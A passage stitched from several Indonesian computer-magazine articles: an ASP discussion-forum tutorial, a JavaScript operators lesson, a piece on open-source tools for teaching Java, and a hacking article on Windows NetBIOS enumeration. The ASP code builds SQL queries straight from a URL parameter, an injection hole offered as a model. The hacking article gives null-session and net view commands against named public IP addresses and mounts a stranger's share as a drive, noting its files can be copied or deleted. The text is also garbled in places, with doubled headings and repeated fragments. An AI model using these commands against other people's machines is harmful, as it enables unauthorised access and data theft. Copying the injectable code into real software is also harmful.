hlm = 1

End If
Case "Selanjutnya"

If objRset.AbsolutePage <  objRset.PageCount Then
hlm = hlm + 1

Else
hlm = objRset.PageCount

End If
Case Else

hlm = 1
End Select
End If
ObjRset.AbsolutePage = hlm

Skrip di atas berfungsi mengatur halaman-halaman forum
kita, bergantung pada kondisi tombol yang ditekan.

<%For i = 1 to objRset.PageSize%>
</font></b>

<TR>
<TD width="17%"> <font size="2">
<%=objRset("Tanggal")%>,
<%=objRset("Jam")%></font></TD>
<TD width="25%"> <font size="2">
<%=objRset("Nama")%> </font> </TD>
<TD> <font size="2"> <A
HREF="isiforum.asp?kat=<%=objRset(5)%>"
><%=objRset("Topik")%></a>
</font>
<%
objRset.MoveNext
If objRset.EOF Then

Exit For
End If
Next%>
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hlm = 1
End If

Case "Selanjutnya"
If objRset.AbsolutePage <  objRset.PageCount Then

hlm = hlm + 1
Else

hlm = objRset.PageCount
End If

Case Else
hlm = 1
End Select
End If
ObjRset.AbsolutePage = hlm
%>
<%
tampilan = objRset.PageSize * hlm

If tampilan > objRset.RecordCount Then
tampilan = objRset.RecordCount

End If
Response.Write tampilan & " Dari " & objRset.RecordCount & " Total Data"
%>
<TABLE BORDER=1 bordercolor="#333333" bgcolor="#F0F0F0" width="100%">
<TR>
<TD width="17%" align="center" bgcolor="#000000"> <b>
<font color="#FFFFFF">Diterima</font></b></TD>
<TD width="25%" align="center" bgcolor="#000000"> <b>
<font color="#FFFFFF">Dari</font></b></TD>
<TD align="center" bgcolor="#000000"><b><font
color="#FFFFFF">Subject
<%For i = 1 to objRset.PageSize%>

</font></b>
<TR>
<TD width="17%"> <font size="2"> %=objRset("Tanggal")%>,
<%=objRset("Jam")%></font></TD>

<TD width="25%"> <font size="2"> <%=objRset("Nama")%> </font> </TD>
<TD> <font size="2"> <A HREF="isiforum.asp?kat=<%=objRset(5)%>"
><%=objRset("Topik")%></a>
</font>
<%
objRset.MoveNext
If objRset.EOF Then

Exit For
End If
Next
%>
</TABLE>
<!--Membuat tombol pengatur halaman-->
<FORM ACTION=list.asp METHOD="POST">
<INPUT TYPE="Hidden" NAME="hlm" Value="<%= hlm %>">
<% If hlm > 1 Then %>
<INPUT TYPE="Submit" Name="tombol" Value="Sebelumnya">
<% End If %>
<% If hlm < objRset.PageCount Then %>
<INPUT TYPE="Submit" Name="tombol" Value="Selanjutnya">
<% End If %>
</FORM><p align="left"><a href="formforum.asp">Join
Forum</a></p>
</body></html>



Setelah mengatur halaman, kini kita akan menampilkan data
yang akan diulang selama data tidak lebih dari 50 (yang telah
kita atur sebelumnya) dan data akan menuju ke data berikut-
nya selama isi dari data belum berakhir.

<FORM ACTION=list.asp METHOD="POST">
<INPUT TYPE="Hidden" NAME="hlm" Value="<%= hlm
%>">
<% If hlm > 1 Then %>
<INPUT TYPE="Submit" Name="tombol"
Value="Sebelumnya">
<% End If %>                
<% If hlm < objRset.PageCount Then %>
<INPUT TYPE="Submit" Name="tombol"
Value="Selanjutnya">
<% End If %>
</FORM>

Satu hal yang berperan sangat penting pada halaman ini
ialah tombol yang kita gunakan untuk menuju ke halaman
sebelumnya dan selanjutnya. Penamaan tombol ini ter-
gantung pada kondisi.

6. Halaman untuk menampilkan isi dari forum
atau sebuah topik (isiforum.asp)
Ketikkan kode berikut pada editor kesayangan anda.
Hasilnya seperti berikut:

Keterangan skrip ASP:
Dim objConn
Dim ObjRset
Dim filePath
Dim strSQL
Dim tombol
Dim hlm
Dim no
filePath = Server.MapPath("forum.mdb")
Kat = Request.QueryString("kat")
strSQL = "SELECT * FROM Data WHERE Topik='" & Kat &
"'"
Set objConn = Server.CreateObject("ADODB.Connection")
objConn.Open "Provider=Microsoft.Jet.OLEDB.4.0;Data
Source=" & filePath
Set objRset = Server.CreateObject("ADODB.Recordset")
objRset.Open strSQL, objConn, adOpenStatic,
adLockOptimistic, adCmdText

Skrip ini berfungsi untuk membuka koneksi ke basisdata
bernama “forum.mdb” dan mengambil string yang
dikirim dari formulir yang berada pada address browser
anda, dan menyimpannya ke variabel. Dan setelah
koneksi dengan basisdata tersambung, maka otomatis
record yang dimaksud akan aktif dan kita tinggal
menampilkan data menggunakan:

"<%=objRset(nomor_urut_field_pada_database)%>
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<html><head>
<title>Forum</title>
</head>
<body>
<!--#Include File=adovbs.inc-->
<table border=0 width="100%"><tr><td width="100%" height=191 valign=top
align=left><p align=left><b><font color="#FF00FF" face=Arial size=2>
<%
Dim objConn
Dim ObjRset
Dim filePath
Dim strSQL
Dim tombol
Dim hlm
Dim no
filePath = Server.MapPath("forum.mdb")
Kat = Request.QueryString("kat")
strSQL = "SELECT * FROM Data WHERE Topik='" & Kat & "'"
Set objConn = Server.CreateObject("ADODB.Connection")
objConn.Open "Provider=Microsoft.Jet.OLEDB.4.0;Data Source=" & filePath
Set objRset = Server.CreateObject("ADODB.Recordset")
objRset.Open strSQL, objConn, adOpenStatic, adLockOptimistic, adCmdText
%>
<CENTER><HR></font></b>
<TABLE BORDER=1 width=60%>
<TR><TH width=50% align=left bgcolor="#303430">
<font face="Times New Roman" size=3 color="#FFFFFF">Pengirim</font></TH>
<TH width=167 align=left bgcolor="#303430">
<font face="Times New Roman" size=3 color="#FFFFFF">Alamat E-Mail</font></TH>
</TR>
<font color="#FF00FF" face=Arial size=2>
<TR><TD width=50% align=left bgcolor="#F0F0F0"><%=objRset(3)%></TD>
<TD align=left width=167 bgcolor="#F0F0F0"><%=objRset(4)%></TD>
</TR></font></TABLE><TABLE width=600><b><font color="#FF00FF" face=Arial size=2><td
width=608 align=center><hr></font><table border=1 height=52><tr><td width="100%" align=center bgcolor="#303430"
height="100%"><b><font face="Times New Roman" size=3><font
color="#FFFFFF"><%=objRset(5)%></font></font></b></td></tr></center><tr><td
width="100%" bgcolor="#F0F0F0" height=21 align=center><textarea rows="11"
cols="72"><%=objRset(6)%></textarea></td></tr></table><CENTER><hr align=center>
</center></table>

</b> <p><a href="formforum.asp?kat=<%=objRset(5)%>">Reply</a> <p><a 
href="default.asp">Kembali Ke Halaman Utama</a></table>
<%objRset.close
objConn.close
Set objRset = Nothing
Set objConn = Nothing%>
</body></html>

Jika ada pertanyaan seputar tutorial ini anda dapat
mengirimkan email anda ke

david_sugianto2002@yahoo.com

Kini anda telah membuat forum untuk
menambah fasilitas pada Web anda

dengan gaya milis.
Anda dapat mengubah tampilan

baik kata maupun warna selama
perubahan tersebut
tidak mengganggu 

jalannya skrip ASP.
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Definisi
Operator adalah simbol-simbol khusus yang digunakan untuk
melakukan operasi tertentu terhadap nilai atau variabel.

Dalam Javascript, operator dapat digolongkan menjadi
beberapa kelompok, yaitu:

Operator Aritmatika
Yaitu operator yang digunakan untuk melakukan operasi-
operasi matematika. Secara garis besar dibedakan atas:

a. Operator Binary
Yaitu operator yang melakukan operasi terhadap dua operand.
Operand adalah nilai atau variabel yang dioperasikan. Yang
termasuk dalam kategori operator Binary adalah:

Perhatikan contoh penggunaan operator-operator tersebut di
bawah ini :

b. Operator Unary
Yaitu operator yang melakukan operasi terhadap satu operand.
Yang termasuk dalam kategori operator Unary yakni sebagai
berikut :

Perhatikan contoh penggunaan operator-operator tersebut di
bawah ini :

Assignment Operator
Disebut juga Operator Penugasan, yakni operator yang digu-
nakan untuk melakukan tugas mengisi nilai suatu variabel.
Yang termasuk dalam kategori operator assignment yakni
sebagai berikut:

OperOperatorator padapada JavaScriptJavaScript
Pada bagian ketiga dari tutorial JavaScript ini kami memperkenalkan Operator. Operator memegang peran

kunci dalam pemrograman dengan JavaScript sehingga pemahaman mengenai unsur ini dalam
mempelajari JavaScript mutlak diperlukan.

Operator Deskripsi

//contoh 3.1
var x = 7
var y = 3
var z
//operasi penjumlahan
z = x + y // variabel z mempunyai nilai 10
//operasi pengurangan
z = x - y // variabel z mempunyai nilai 4
//operasi perkalian
z = x * y // variabel z mempunyai nilai 21
//operasi pembagian
z = x / y // variabel z mempunyai nilai 2
//operasi sisa pembagian
z = x % y // variabel z mempunyai nilai 1

+ Penjumlahan
- Pengurangan
* Perkalian
/ Pembagian
% Modulus atau Sisa Bagi

Operator Sintaks Deskripsi

= x = y x = y
+= x += y x = x + y
-= x -= y x = x - y
*= x *= y x = x * y
/= x /= y x = x / y
%= x %= y x = x % y

Operator Deskripsi

++ Penambahan satu angka (increment)
-- Pengurangan satu angka (decrement)

///contoh 3.2
var x = 7
var y = 3

x++ //variabel x nilainya bertambah satu 
// sehingga nilai variabel x sekarang adalah 8

y-- //variabel y nilainya bertambah satu 
// sehingga nilai variabel y sekarang adalah 2
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Operator Perbandingan
Yaitu operator yang digunakan untuk membandingkan dua
nilai dan akan menghasilkan dua kemungkinan nilai saja,
apakah itu True atau False. Yang termasuk dalam kategori
operator perbandingan yakni sebagai berikut:

Operator Logika
Yaitu operator yang digunakan untuk merangkaikan atau
merelasikan nilai logika operand-operand dan menghasilkan
dua kemungkinan nilai saja, True atau False. Yang termasuk
dalam kategori operator logika adalah:

Operator String
Yaitu operator yang digunakan untuk merangkaikan atau
memanipulasi string. Simbol yang digunakan adalah tanda
plus (+) yang kegunaannya adalah untuk merangkaikan dua
string atau lebih menjadi satu string.

Perhatikan contoh penggunaannya di bawah ini :

Operator Bitwise
Yaitu operator yang digunakan untuk operasi dalam bilangan
biner. Operand-operand yang dioperasikan oleh operator
bitwise harus dalam integer atau karakter. Yang termasuk
dalam kategori operator bitwise yakni sebagai berikut:

Presedence Operator
Apabila lebih dari satu operator digunakan bersamaan dalam
satu statement, maka pengerjaan operasi didasarkan prioritas.
Operator yang memiliki prioritas lebih tinggi akan didahulu-
kan meskipun ditulis belakangan. Berikut adalah urutan
prioritas operator, dari atas ke bawah sesuai prioritasnya.

Perhatikan contoh berikut : y = 2 + 5 * 7
Pada contoh di atas, operasi yang akan dikerjakan terlebih
dahulu adalah operasi perkalian antara bilangan 5 dengan 7,
baru kemudian hasil operasi tersebut dijumlahkan dengan dua,
meskipun operator perkalian di belakang, namun akan didahu-
lukan dalam eksekusi, karena prioritasnya lebih tinggi.

Lalu bagaimana jika kita menginginkan operasi penjumlahan
didahulukan sebelum perkalian? Solusinya adalah dengan
memberi tanda kurung untuk mengelompokkan operasi.
Operasi yang bertanda kurung akan dianggap sebagai satu
kesatuan yang tidak dapat dipisah, sehingga program akan
mengeksekusi terlebih dahulu. Dengan sedikit modifikasi,
contoh di atas  menjadi: y = (2 + 5) * 7

Jadi operasi penjumlahan terhadap bilangan 2 dan 5 dilakukan
terlebih dahulu, baru hasilnya dikalikan dengan bilangan 7.
Hasilnya, nilai variabel y akan berbeda. Pada contoh di atas
nilai variabel y 37, sedangkan pada contoh ini 49.

Ekspresi
Definisi
Ekspresi dapat dikatakan sebagai kombinasi dari variabel,
konstanta dan operator.
Ekspresi dapat dibedakan atas:
a. Ekspresi yang mengembalikan nilai. Contoh : x = 6

Ekspresi di atas mengembalikan nilai variabel x kepada
bilangan 6

b. Ekspresi yang memanipulasi nilai. Contoh : y = y + 5

Ekspresi di atas memanipulasi nilai variabel y menjadi nilai
sebelumnya ditambah dengan bilangan 6.

// contoh 3.3
var str1, str2, str3
str1 = “Belajar”
str2 = “Javascript”

str3 = str1 + str2 // str3 = "Belajar Javascript"

str1 = “Belajar”
str2 = “Javascript”

str3 = str1 + “” + str2 //str3 = “Belajar Javascript”

Operator Deskripsi Contoh

== Sama dengan 1==2 //false
!= Tidak sama dengan 1!=2 //true
> Lebih besar 1>2 //false
< Lebih kecil 1<2 //true
>= Lebih besar sama dengan 1>=2 //false
<= Lebih kecil sama dengan 1<=2 //true

Operator Deskripsi Contoh

&& Operasi and x  && y
Hanya bernilai true jika
masing-masing x dan y
bernilai true

|| Operasi or x  || y
Hanya bernilai false jika
masing-masing x dan y
bernilai false

! Operasi not !x  
Bernilai kebalikan dari nilai x

Operator Sintaks Deskripsi

& x & y Hanya bernilai 1 jika kedua 
operand bernilai 1

Operator Sintaks Deskripsi

| x | y Hanya bernilai 0 jika kedua 
operand bernilai 0

^ x ^ y Bernilai 1 jika salah satu 
operand bernilai 1

>> x >> y Menggeser x  ke kanan sebe-
sar y bit (x dalambinari)

>>> x >>> y Menggeser x  ke kanan sebe-
sar y bit dan memasukkan 
nilai nol dari kiri

Operator Deskripsi

++, --, -, ! Inc, Dec, Minus, Not
*, /, % Perkalian, Pembagian, Modulus
+, -, + Penjumlahan, Pengurangan, Gabung String
<<, >>, >>> Pergeseran
<, <=, >, >= Lebih kecil, Lebih kecil sama dengan, Lebih 

besar, Lebih besar sama dengan
==, != Sama dengan, Tidak sama dengan
& And bit
^ Xor bit
| Or bit
&& And logika
|| Or logika
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ADA KEBANYAKAN
universitas, Java
menjadi sebuah

bahasa pemrograman utama
yang digunakan dalam sebuah
konsep pengajaran bahasa
pemrograman [1]. Java juga
secara terus menerus diguna-
kan dalam setiap mata-pela-
jaran bagi para mahasiswa,
contoh-contoh praktis dan

tentu saja dalam pemberian
tugas. Dan ini umumnya me-
miliki pengaruh yang sangat
kecil atau bahkan tidak ada
sama sekali terhadap siklus
konsep pengajaran dan pem-
belajaran (teaching and
learning) bahasa pemrogram-
an dan bahasa pemrograman
itu sendiri dalam komunitas
universitas. Karena siklus ini

masih mengikuti pola
tradisional:

• Pengajar (guru, dosen)
mempersiapkan bahan-bahan
kuliah, latihan dan tugas.

• Pengajar memberikan
beberapa kuliah awal pada
mata kuliah tertentu (dalam
hal ini adalah bahasa
pemrograman Java).

• Mahasiswa kemudian
mempelajari mata kuliah ter-
sebut dengan membaca buku
buku yang telah dirujukkan
dan beberapa bahan pendidik-
an. Para mahasiswa kemudi-
an juga mencoba melatih
aktivitas pemrograman de-
ngan menuliskan program
bahasa Java mereka masing-
masing.

• Mahasiswa menyelesaikan
tugas-tugas dan latihan
dalam mempersiapkan ujian
yang akan ditempuh
selanjutnya.

• Kemudian para mahasiswa
dapat memilih apakah ingin
berpartisipasi dalam kelom-
pok diskusi dalam membahas
setiap pertanyaan yang tim-
bul dalam proses belajar
mereka.

• Akhirnya mahasiwa
melaksanakan ujian.

Pada saat ini, hampir seluruh
universitas telah mendukung
konsep pengajaran dan pem-
belajaran dengan mengguna-
kan komputer  sebagai sistem
pendukungnya. Computer
Assisted Learning and Com-
puter Assisted Teaching
(CAL+CAT) telah berkem-
bang secara penuh dan diim-
plementasikan pada sebuah
institusi di Jerman yang ber-
nama Lehrstuhl fuer Wirt-
schaftsinformatik und Con-
trolling an der Universitaet
Muenster (Department of
Information Systems, Uni-
versity of Muenster).

Untuk para pembaca yang
mengerti bahasa Jerman
dipersilakan membaca lebih
lanjut pada referensi [2].
Model ini mempersilakan an-
da untuk mengatur imple-
mentasi dari proses pengajar-
an dan pembelajaran sesuai
dengan kebutuhan organisasi
anda. Sehingga anda dapat
menggunakan model
CAL+CAT untuk mendu-
kung setiap instruksi, ter-
masuk di dalamnya bahasa

PPemremrogrograman Javaaman Java
dengan Tdengan Teknologi & Produk Open Sourceeknologi & Produk Open Source

Piranti lunak Open Source dapat membantu proses pendidikan secara umum dan proses pengajaran dan
pembelajaran bahasa pemrograman Java secara lebih khusus. Blasius Lofi Dewanto menunjukkan

hubungan antara NetBeans Java IDE (Integrated Development Environment), FSL (Freestyle Learning) dan
OpenUSS (Open University Support System) akan ditunjukkan dalam sebuah proses integrasi pengajaran

dan pembelajaran di dalam sebuah komunitas universitas.

P

Vendor Type

BlackBoard: www.blackboard.com LMS

eCollege: www.ecollege.com LMS

WebCT: www.webct.com LMS

CampusPipeline: ww.campuspipeline.com LMS

TutorsEdge: www.tutorsedge.com Virtual 
Classroom 
(synchronous 
communicat
ion)

Toolbook: http://home.click2learn.com/
products/toolbook.html CBT/CAP

Macromedia Flash, Freehand, Director,
Authorware: www.macromedia.com/
software CBT/CAP

JBuilder: http://www.borland.com/jbuilder JDT

VisualAge: www.ibm.com JDT

Tabel 1. Vendor Komersial
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pemrograman Java.

Sebelum kita melihat model
tersebut mari kita melihat
beberapa model dari piranti
lunak yang digunakan dalam
model CAL+CAT.
Contohnya adalah:

Learning Management
System (LMS)
Ini merupakan kendaraan
utama dalam mengatur
proses pengajaran dan
pembelajaran. Kumpulan
piranti lunak ini didesain
untuk pengaturan pada
tingkat individu, ruang kuliah
dan institusi. Piranti lunak

Communication Manage-
ment  (synchronous and
asynchronous communic-
ation) dapat juga diintegrasi-
kan dengan LMS, entah
sebagai bagian dari paket
piranti lunak atau sebagai
komponen stand-alone yang
dapat dengan mudah diinte-
grasikan ke dalam LMS.
Karakter utama dari LMS
adalah bahwa pengguna atau
users—dalam hal ini adalah
pengajar dan pelajar—harus
terkoneksi dengan Internet
untuk menggunakan perang-
kat piranti lunak yang ada.

Computer Based Training
(CBT)/Course Authoring
Package (CAP)
CBT adalah piranti lunak
offline yang mendukung
proses pembelajaran secara
lokal pada masing masing
komputer mahasiswa. Wa-
laupun pada umumnya tipe
perangkat piranti lunak ini
juga bekerja secara online,
kebanyakan para pengguna
lebih memilih memakai pi-
ranti lunak dari sebuah CD-
ROM karena lebar band-
width yang dibutuhkan un-
tuk memproses CBTs' large
videos dan interaksi client/

server. CAP biasanya diguna-
kan untuk mengembangkan
isi pada piranti lunak CBT.

Java Development Tools
(JDT)

JDT sebuah lingkungan di
mana para mahasiswa dapat
memperoleh  pengalaman
praktis (hands-on experience)
dalam pemprograman dengan
menggunakan Java. Piranti
lunak JDT pada umumnya
dipasang pada masing masing
komputer mahasiswa dan
digunakan secara offline. Text
editors, compilers dan
debuggers masuk dalam
kategori ini.

Sekarang setelah kita sedikit
mengenal mengenai perleng-
kapan CAL+CAT, marilah
kita  melihat bagaimana per-
lengkapan ini digunakan da-
lam siklus pendidikan. Gam-
bar di atas memberikan se-
buah pandangan rinci me-
ngenai bagaimana sebuah
proses pengajaran dan pem-
belajaran bahasa pemrogram-
an Java dapat dibantu dengan
piranti lunak CAL+CAT.

Vendor Komersial &
Open Source Software
Support

Beberapa perlengkapan piran-
ti lunak komersial mengha-
silkan aplikasi yang dapat
digunakan dalam proses
pendidikan. Tabel 1 membe-
rikan gambaran singkat
mengenai beberapa perusa-

• Proses teaching and learning yang didukung oleh aplikasi piranti lunak

Open Source Type Programming language

ClassWeb Open Source Distribution: http://classweb.ucla.edu LMS PHP templates and Perl
CGI scripts

The Manhattan Virtual Classroom: http://manhattan.sourceforge.net LMS CGI in C language

ShadowNetworkspace: http://sns.internetschools.org LMS CGI scripts C and Perl

Authenticated User Community (AUC): http://auc.sourceforge.net LMS CGI scripts C and Perl

OpenUSS: http://openuss.sourceforge.net LMS Java (J2EE)

Freestyle Learning: http://www.wi.uni-muenster.de/aw/freestyle-
learning/english/eindex.htmFSL is a fully developed product already in use at the
University of Muenster. This project was recently declared an open source project.

jEdit: http://jedit.sourceforge.net
JDT
Java (Swing)

Jext: http://jext.sourceforge.net JDT Java (Swing)

NetBeans: http://www.netbeans.org JDT Java (Swing)

Tabel 2. Open Source Software

CBT/CAP Java (Swing)
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haan yang bergerak dibidang tersebut di
atas.

Lalu bagaimana dengan piranti lunak
open source ? Apakah ada alternatif
piranti lunak open-source terhadap
produk-produk yang telah beredar di
tabel 1 ? Tentu saja jawabannya adalah
yes! Kita patut berterima kasih terhadap
besarnya aktifitas dalam pengembangan
piranti lunak open source dalam
beberapa tahun terakhir ini, versi open
source saat ini telah beredar pula bagi
hampir disemua perangkat aplikasi
pendidikan. Tab. 2 menunjukkan
beberapa sumber pendidikan dengan
open source.

Pada saat ini, satu-satunya portal bagi
produk piranti lunak open source di
bidang pendidikan adalah
CampusSource
(http://www.campussource.de dalam
bahasa Jerman atau
http://www.campussource.org dalam
bahasa Inggris). CampusSource adalah

sebuah proyek institusi di Jerman yang
memiliki beberapa proyek yang
bernaung di bawah payung mereka
(termasuk didalamnya OpenUSS).
Seluruh proyek yang bernaung dibawah
CampusSource menggunakan GPL
sebagai bentuk lisensi mereka. Tujuan
utama dari CampusSource adalah untuk
mengumpulkan dan mengintegrasikan
seluruh proyek piranti lunak open
source yang ada di bidang pendidikan.

Alternatif penggunaan open source
adalah sama efektifnya atau bahkan
untuk sesuatu alasan lebih baik
dibandingkan dengan rekan-rekan yang
komersial, sehingga tidak ada sebuah
alasan yang nyata untuk tidak
menggunakan piranti lunak open source
dalam bidang pendidikan - terutama
dalam proses pengajaran dan
pembelajaran bahasa Java sebagai
sebuah programming language. Oleh
karenanya piranti lunak Open source
mempersembahkan sebuah sumber

yang sangat amat berharga bagi dunia
pendidikan, yang kerap kali tidak
memiliki banyak sumber sumber
keuangan untuk membeli produk
komersial.

* Blasius Lofi Dewanto (dewanto@uni-
muenster.de) adalah asisten riset di
Westfälische Wilhelms-Universität Muenster,
Jerman Institut für Wirtschaftsinformatik
Lehrstuhl für Wirtschaftsinformatik und
Controlling dan arsitek utama pengembang
OpenUSS (Open University Support
System).

References
[1] Stewart, B. (2001): Java as a Teaching
Language, di
http://java.oreilly.com/news/teachjava_0101.
html
[2] Konsep CAL+CAT (semua makalah
dalam bahas Jerman) dapat ditemukan di
http://www.wi.uni-muenster.de/aw/
abcalcat.htm

ntuk menginstalasi OpenUSS dengan benar,
langkah-langkah berikut perlu diikuti:

Instalasi Java Virtual machine
Semua komponen pada OpenUSS mengguna-
kan JDSK 1.2.2 dari Sun Microsystem. Dengan
demikian yang pertama kali harus anda laku-
kan adalah menginstalasi JDSK ini pada plat-
form pilihan anda. Khusus untuk platform
Windows, dapat juga menggunakan J2EE 1.1.

Data Layer
Database default yang digunakan oleh OpenUSS adalah
HyupersonicSQL, InstantDB, atau InterBase. Pada versi
alfa ini, pada OpenUSS yang di-download sudah
disediakan HypersonicSQL, jadi anda tidak usah
menginstalasinya sendiri. Apabila hendak menggunakan
database lain, maka OpenUSS harus dikonfigurasi ulang
sendiri.

Business Object Layer
Untuk menjalankan Business Object
digunakan server JOnAS (Java Open
Application Server). Selama versi
final Enhydra enterprise belum di-
release, kita harus menggunakan
JOnAS secara terpisah. Anda harus
menginstalasi JOnAS terlebih dahu-
lu sebelum menginstalasi OpenUSS.

Presentation Layer
Install Enhydra untuk layer ini.
Enhydra adalah server aplikasi
pertama untuk Java/XML yang
bersifat open source.

OpenUSS
OpenUSS didistribusikan sebagai file ZIP. Install OpenUSS
setelah menginstalasi komponen-komponen di atas.

Penjelasan Ringkas OpenUSS (versi alfa)

U
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ETELAH MELAKUKAN 'PEKERJAAN RUMAH' MENCARI
informasi secara non-intrusif lewat proses foot-
printing dan scanning, kini sang hacker sudah

tahu sasaran yang dituju. Proses selanjutnya, yang disebut
enumerasi, adalah proses pencarian informasi lebih lanjut
lagi untuk mematangkan serangan. Perbedaan enumerasi
dengan kedua proses sebelumnya adalah tingkat intrusinya,
yang karenanya mengharuskan hacker untuk log in ke
sasaran. Hal ini membuatnya dapat dikenali.

Informasi yang dikumpulkan pada proses enumerasi sudah
sangat spesifik terhadap sasaran yang dituju:

Network resource dan share
User dan group
Aplikasi dan banner

Sepintas informasi yang dikumpulkan tampak tidak berba-
haya, namun informasi yang bocor dari lubang-lubang ini
dapat menjadi awal serangan hacking. Pada umumnya, se-
kali hacker mendapatkan user name yang absah, maka
tinggal tunggu waktu saja sebelum intruder ini menebak
password untuk user name itu yang kemudian terhubung
ke kelemahan yang ada pada protokol resource sharing yang
bersangkutan. Dengan jalan menutup kelemahan ini, anda
dapat menghilangkan tempat awal hacker menjejakkan kakinya.

Pada artikel 'Legion v.1.2: Gampang Kok Jalan-jalan ke Kom-
puter Orang' ditunjukkan bagaimana enumerasi dengan
Legion, suatu NetBIOS scanner, akan dengan cepat me-
nunjukkan file atau disk yang di-share dan apakah share
itu diproteksi dengan password atau tidak. Bila tidak, maka
file dan disk itu langsung jadi milik sang hacker sedangkan
bila diproteksi dengan password masih dapat ditebak dengan
Brute Force tool.

Proses enumerasi bersifat spesifik menurut sistem opera-
sinya. Pada bahasan kali ini akan dibahas proses enumerasi
terhadap sistem Windows NT/2000 yang juga berlaku un-
tuk Windows 95/98/ME. Bahasan juga dibatasi hanya pada
null-session dan NetBIOS scanning. Adapun enumerasi

SNMP, DNS Zone Transfer, Host Enumeration, Active Direct-
ory Enumeration, Banner Grabbing, dan Registry Enume-
ration akan dibahas di kesempatan mendatang.

Windows NT/2000 Hacking Kit
Sejak Windows NT 3.1, Microsoft telah menyediakan do-
kumentasi tambahan dan CD ROM yang berisi utilitas
untuk administrasi network: Windows NT Resource Kit
(NTRK). CD ROM ini berisi utilitas yang hebat-hebat,
mulai dari implementasi Perl scripting untuk mem-porting
berbagai macam utilitas Unix sampai remote administra-
tion tool.

Tool-tool ini selain dapat digunakan oleh administrator
network, dapat juga digunakan oleh intruder. Akibatnya
NTRK mendapat julukan 'The Windows NT Hacking Kit.'
Beberapa dari tools ini dapat di-download gratis di ftp://ftp.
microsoft.com/bussys/winnt/winnt-public/reskit. Windows
2000 juga menyediakan tool-tool seperti ini. Pada Windows
2000 Server CD terdapat utilitas yang lazim digunakan oleh
para hacker dalam folder Support\Tools.

Untuk mengurangi kemungkinan serangan, walaupun me-
miliki tool-tool di atas, para administrator network yang
menggunakan Windows NT dianjurkan untuk tidak meng-
instalasi semuanya. Cukup instalasi yang perlu-perlu saja
pada server. Biasanya administrator network menempatkan
tool-tool ini pada removable disk hanya untuk keperluan
maintenance jaringan.

Enumerasi Paling Gawat: Null-Session
Windows NT sangat tergantung pada CIFS/SMB dan NetBIOS
untuk menjalankan fasilitas network-nya. Standar CIFS/
SMB dan NetBIOS ini sangat 'bawel' karena memberikan
banyak informasi pada siapa saja yang memasuki mesin ini
melalui port TCP 139.

Jadi langkah awal untuk masuk ke dalam sistem ini secara
remote (bila dari hasil port scan diketahui bahwa port 139
sedang listen) adalah melakukan koneksi tanpa otentikasi

EnumerEnumerasiasi
Mematangkan SerMematangkan Seranganangan

Enumerasi adalah langkah terakhir yang perlu dilakukan seorang hacker untuk mengumpulkan informasi
mengenai sasaran yang akan ditujunya. Proses enumerasi bersifat spesifik berdasarkan sistem operasinya.

Pada bahasan kali ini diuraikan proses enumerasi terhadap sistem Windows NT/2000 maupun 9x.
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ke system NT/2000 (disebut null-session, sebab tanpa user
name serta tanpa password). Misalkan kita mencoba proses
null-session ke IP Address 203.125.135.11 sebagai berikut
dari Windows NT:

C:\>net use \\203.125.135.11\IPC$ “” /u:””

Yang berarti melakukan koneksi ke komunikasi interproses
tersembunyi IPC$ (share) pada IP address 203.125.135.11
sebagai user anonim (/u:””) dengan password kosong (“”).

Pada Windows 95/98/ME perintahnya adalah

C:\>net use \\203.125.135.11\IPC$

Terlihat bahwa proses null-session dapat dilaksanakan ter-
hadap komputer yang terhubung ke Internet dengan IP
Address tersebut. Ini menandakan bahwa komputer yang
bersangkutan sangat rawan terhadap hacking.

Dengan berhasilnya melaksanakan proses null-session, maka
intruder kini mendapatkan channel terbuka untuk mencari
segala macam informasi network seperti share, user, group,
Registry key, dan lain sebagainya. Kelemahan ini dikenal
sebagai 'Red Button vulnerability,' null-session connection,
atau anonymous logon, dan merupakan pijakan pertama
penyerang pada sistem anda yang dapat sangat merusak.

NT/2000 Network Enumeration
Yang pertama kali dicari intruder adalah ada apa saja pada
network NT/2000. Karena NT/2000 sangat tergantung pada
NetBIOS naming service (UDP 137), maka kegiatan ini se-
ring kali disebut sebagai “enumerating the NetBIOS wire.”

Tragisnya semua ini telah terpasang pada sistem operasi Win-
dows itu sendiri! Kita akan membahas beberapa command
line yang sehubungan dengan network yang merupakan
perintah-perintah standar pada NT/2000 maupun 95/98/ME.

Enumerasi Domain dengan net view
Perintah net view adalah contoh bagus dari tool enume-
rasi yang sudah built-in dalam sistem operasi Windows.

Perintah untuk melihat domain yang ada padan NT/2000:

C:\>net view /domain

Sedangkan untuk melihat apa yang terdapat pada domain
tertentu perintahnya adalah (sebagai contoh melihat apa
yang ada dalam domain Neotek):

C:\>net view /domain:NeoTek

Sedangkan pada Windows 95/98/ME perintah yang setara
adalah

C:\>net view

Perintah ini akan memperlihatkan apa saja yang ada pada
LAN (local area network). Pada contoh ini adalah ketiga

komputer pada network peer-to-peer milik redaksi NeoTek,
masing-masing komputer dengan nama JESSICA, KARINA,
dan KOSASIH. Karena peer-to-peer, ketiga komputer itu
merupakan server bagi yang lain.

Untuk melihat share apa saja pada komputer dengan nama
KARINA pada network NeoTek (IP address 192.168.123.187)
dapat digunakan perintah:

C:\> net view \\karina

atau

C:\>net view \\192.168.123.187

Terlihat bahwa pada domain NeoTek terdapat komputer
dengan nama KARINA dan komputer itu mempunyai
empat share resources, yaitu satu printer (BROTHER) dan
tiga disk dengan drive letter C, D, dan E.

Sekarang kita melangkah lebih jauh, keluar dari network
sendiri dan mencoba melihat komputer orang lain yang
juga terhubung ke Internet. Karena mampu melihat apa
yang ada pada suatu IP Address, sebenarnya kita tentunya
dapat juga melihat apa yang ada pada suatu IP Address dari
komputer yang di luar network kita sendiri. Syaratnya asal-



NeoTekno

28 NeoTek Juli 2002

kan port UDP 139 komputer yang bersangkutan terbuka.
Misalkan kita lihat apa yang ada pada komputer dengan IP
Address 203.125.135.46

C:\>net view \\203.125.135.46

Nah, terlihat bahwa komputer (entah milik siapa) yang
terhubung ke Internet pada IP Address 203.125.135.46
mempunyai tiga share resources, yaitu disk C dan dua file
yang dinamakan MOCAZH dan MSOFFICE.

Kembali ke perintah net use yang melaksanakan null-
session. Apabila perintah itu dimodifikasi sebagai berikut:

C:\>net use G: \\203.125.135.46\MOZACH

Maka share itu di-mapping menjadi drive G: di komputer
kita dan dapat kita perlakukan sebagai hard disk kita sen-
diri (yang berarti kita dapat meng-copy, men-delete, atau-
pun menambahkan file di-share itu). Jadi setelah perintah
itu, tinggal ketikkan:

C:\>cd G:

C:\>dir G:

Selanjutnya terserah anda. Teknik ini kini diotomatisasi
oleh NetBIOS scanning tool seperti misalnya Legion atau
